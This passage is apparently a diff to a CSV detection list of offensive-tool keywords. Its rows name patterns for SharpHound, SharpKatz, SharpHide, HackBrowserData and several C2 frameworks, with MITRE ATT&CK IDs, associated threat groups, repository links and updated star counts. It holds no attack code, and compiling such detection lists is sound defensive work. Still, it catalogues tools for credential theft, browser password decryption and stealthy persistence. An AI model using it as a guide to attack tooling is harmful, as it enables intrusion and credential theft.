tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" -"*SharpHandler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Sharp-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*SharpHandler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpHide.csproj*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.exe*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.sln*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide-master*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of 
Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*SharpHose.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharphound -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpHound-*.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*sharphound*--stealth*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*sharphound.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHose.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharphound -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 
- TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpHound-*.zip*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*sharphound*--stealth*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*sharphound.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*SharpHound.cna*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*SharpHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" "*SharpHound.exe*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHound.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*SharpHound.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpHound.exe*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHound.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*SharpHound.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpHound.exe*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*SharpHound.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical 
intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*SharpHound.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHound.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*SharpHound.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*SharpHound.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*SharpHound.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHound.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*SharpHound.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" 
-"*SharpHound2*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHound2*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*Sharphound2.*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHound3*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHound3*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*Sharphound-Aggressor*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*SharpHoundCommon.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" 
-"*SharpHoundCommonLib*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*SharpHoundCommon.*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*SharpHoundCommonLib*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*sharpinline *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Sharpkatz*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpKatz.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 